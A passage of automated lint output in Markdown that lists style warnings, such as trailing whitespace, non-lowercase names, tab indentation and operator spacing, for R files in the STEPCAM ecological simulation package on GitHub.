\n^~\n```\n[R/ABC_SMC.R:184:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L184) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FRic <- FD_output$FRic \n                            ^\n```\n[R/ABC_SMC.R:186:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FEve <- FD_output$FEve \n                            ^\n```\n[R/ABC_SMC.R:188:29:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L188) *style:* **Trailing whitespace is superfluous.**\n```r\n​      FDiv <- FD_output$FDiv \n                            ^\n```\n[R/ABC_SMC.R:197:69:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L197) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # calculate distance of trait mean between simulated community \n                                                                    ^\n```\n[R/ABC_SMC.R:201:72:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L201) *style:* **Trailing whitespace is superfluous.**\n```r\n​      # (inverse) fit of model: euclidian distance of FD and trait mean \n                                                                       ^\n```\n[R/ABC_SMC.R:203:14:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L203) *style:* **Variable and function names should be all lowercase.**\n```r\n​      fit <- calculateDistance(FRic[[1]], FEve[[1]], FDiv[[1]],\n             ^~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:205:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L205) *style:* **Trailing whitespace is superfluous.**\n```r\n​      \n^~~~~~\n```\n[R/ABC_SMC.R:208:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L208) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_disp[numberAccepted] <- params[1]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/44ada21e1a7222e3876f501b55342b879eea0647/R/generateArtificialData.R#L37) *style:* **Put spaces 